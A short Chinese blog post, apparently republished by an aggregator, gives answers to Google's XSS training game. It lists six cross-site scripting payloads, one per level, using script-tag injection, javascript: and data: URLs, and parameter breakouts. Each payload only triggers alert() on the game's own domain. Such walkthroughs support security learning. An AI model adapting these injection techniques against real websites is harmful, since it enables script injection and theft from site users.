Google XSS 小游戏 答案

Posted borber

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Google XSS 小游戏 答案相关的知识,希望对你有一定的参考价值。

记录

谷歌 XSS 小游戏

  1. 第一关

    </b><script>alert("Borber")</script>
    
  2. 第二关

    <p>hello <a name="n" href="javascript:alert(‘Borber‘)"><em>Borber</em></a></p>
    
  3. 第三关

    https://xss-game.appspot.com/level3/frame#4‘><script>alert("Borber")</script>
    
  4. 第四关

    https://xss-game.appspot.com/level4/frame?timer=100‘),alert(‘Borber
    
  5. 第五关

    https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert("Borber")
    
  6. 第六关

    https://xss-game.appspot.com/level6/frame#data:text/plain,alert("Borber")
    

以上是关于Google XSS 小游戏 答案的主要内容,如果未能解决你的问题,请参考以下文章

Google xss game 小游戏

XSS:如何从 C# 中的字符串中删除 JS 片段?

通过脚本片段绕过XSS防御

Xss小游戏通关秘籍

Google将删除Chrome内置的XSS保护(XSS Auditor)

XSS基础学习